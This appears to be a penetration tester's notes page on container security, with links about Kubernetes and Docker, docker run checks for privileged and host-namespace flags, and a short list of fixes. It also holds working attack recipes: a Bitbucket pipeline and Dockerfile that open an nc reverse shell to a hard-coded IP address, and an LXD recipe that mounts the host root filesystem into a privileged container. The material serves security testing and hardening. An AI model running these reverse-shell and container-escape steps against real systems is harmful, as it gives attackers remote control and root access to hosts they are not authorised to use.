Containters
Containers¶
Kubernetes¶
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-1/
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-2/
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-3/
Bad Pods: Kubernetes Pod Privilege Escalation
The Kubenomicon: Kubernetes from an offensive perspective
Docker¶
Escaping Namespaces
https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/
https://www.nccgroup.trust/uk/our-research/abusing-privileged-and-unprivileged-linux-containers/
https://www.nccgroup.trust/uk/our-research/understanding-and-hardening-linux-containers/
https://google.github.io/nsjail/
https://www.youtube.com/watch?v=uQigvjSXMLw
https://docs.docker.com/engine/security/seccomp/
https://www.electricmonk.nl/log/2017/09/30/root-your-docker-host-in-10-seconds-for-fun-and-profit/
Does the Docker Deamon have an authorization module?
- check /var/lib/authz-broker/
Does the Docker Deamon use User Namespaces?
Check for Symbolic Link Bypassing volume mounting
Check for protections inside a container:
>>> sudo docker run --rm --privileged -v `pwd`:/host -it node:latest /bin/bash
root@acf8b3edec59:/# /host/ami
Container Runtime: docker
Has Namespaces:
pid: true
user: false
AppArmor Profile: unconfined
Capabilities:
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
Check for network namespacing:
>>> sudo docker run --rm --net host -v `pwd`:/host -it node:latest /bin/bash
root@lupin:/#
Check For Volume Mounting:
>>> sudo docker run --rm --net host --volume /:/rootfs -v `pwd`:/host -it node:latest /bin/bash
root@lupin:/#
Check For device mapping:
sudo docker run --rm --device /:/devhost -v `pwd`:/host -it node:latest /bin/bash
Check for disabling Security Options:
>>> sudo docker run --rm --security-opt seccomp=unconfined -v `pwd`:/host -it node:latest /bin/bash
root@73b3de272685:/# exit
Check for disabling apparmor Security Options:
>>> sudo docker run --rm --security-opt apparmor=unconfined -v `pwd`:/host -it node:latest /bin/bash
root@edb17ce6126a:/# exit
Check for setting Custom Kernel parameters:
>>> sudo docker run --rm --sysctl net.ipv4.ip_forward=1 -v `pwd`:/host -it node:latest /bin/bash
root@d4e604c9db9a:/#
Check for username namespacing:
>>> sudo docker run --rm --userns host -v `pwd`:/host -it node:latest /bin/bash
root@c22b43ed3c91:/# exit
>>> sudo docker run --rm --uts host -v `pwd`:/host -it node:latest /bin/bash
root@c22b43ed3c91:/# exit
Check for additional kernel syscalls:
>>> sudo docker run --rm --cap-add ALL -v `pwd`:/host -it node:latest /bin/bash
root@4fbd268aeb7d:/#
Check for IPC namespacing:
>>> sudo docker run --rm --ipc host -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
Check for Process namespacing:
>>> sudo docker run --rm --pid host -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
Check for Root user namespacing:
>>> sudo docker run --rm --map-root-user -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
Check for Mounting:
>>> sudo docker run --rm --mount /:/rootfs -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
Reverse Shell through Docker¶
bitbucket-pipelines.yml:
image:
name: atlassian/default-image:latest
pipelines:
default:
- step:
script:
- ln -s / $BITBUCKET_CLONE_DIR/ln
- curl -oDockerfile https://gist.github.com/staaldraad/b805639cf44363692f13493f651c5689/raw/f8f65876cd464611ad0f7d365a9cf36a950fde36/Dockerfile
- docker build . -t xyz
- docker run -i --rm -v $BITBUCKET_CLONE_DIR/ln/:/ln xyz:latest
services:
- docker
caches:
- docker
Dockerfile:
FROM docker
RUN apk update
RUN echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 139.59.42.102 443 >/tmp/f" > /pew.sh
RUN chmod +x /pew.sh
ENTRYPOINT /pew.sh
Docker Sockets¶
Docker Socket Locations:
>>> sudo ls -al /var/run/docker/containerd
total 8
drwx------ 3 root root 160 Jan 28 18:00 .
drwx------ 8 root root 180 Jan 28 12:53 ..
srw-rw---- 1 root root 0 Jan 28 12:52 containerd-debug.sock
-rw-r----- 1 root root 6 Jan 28 12:52 containerd.pid
srw-rw---- 1 root root 0 Jan 28 12:52 containerd.sock
srw-rw---- 1 root root 0 Jan 28 12:52 containerd.sock.ttrpc
-rw------- 1 root root 706 Jan 28 12:52 containerd.toml
drwx--x--x 4 root root 80 Jan 28 12:52 daemon
>>> sudo ls -al /var/run/doc*.*
-rw-r--r-- 1 root root 6 Jan 28 12:52 /var/run/docker.pid
srw-rw---- 1 root docker 0 Jan 28 12:52 /var/run/docker.sock
Fixes¶
Use User namespaces:
- This prevents --pid host, --device, --ipc host,
Prevent removing User Namespaces through the authz plugin:
- This can be checked by using the --userns host parameter
Prevent Adding unnecessary Capabilities:
- This allows access to more Kernel functions that may be restricted otherwise --cap-add ALL
Prevent seccomp bypass through the authz plugin:
- --security-opt seccomp=unconfined
Prevent apparmor bypass through the authz plugin:
- --security-opt apparmor=unconfined
LXD¶
Build the LXD Image on other Machine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
>>> ls
Import and Init Machine:
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
#Show that the image was inported
lxc image list
#Add privlaged container
lxc init myimage ignite -c security.privileged=true
#Mount the Root file system into the continer
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
#Start Continaer
lxc start ignite
#Start shell in the container
lxc exec ignite /bin/sh